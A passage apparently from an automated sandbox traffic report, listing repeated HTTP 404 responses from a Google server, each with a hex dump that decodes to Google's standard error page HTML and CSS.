65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:48 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:49 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:51 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:52 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:53 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:54 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
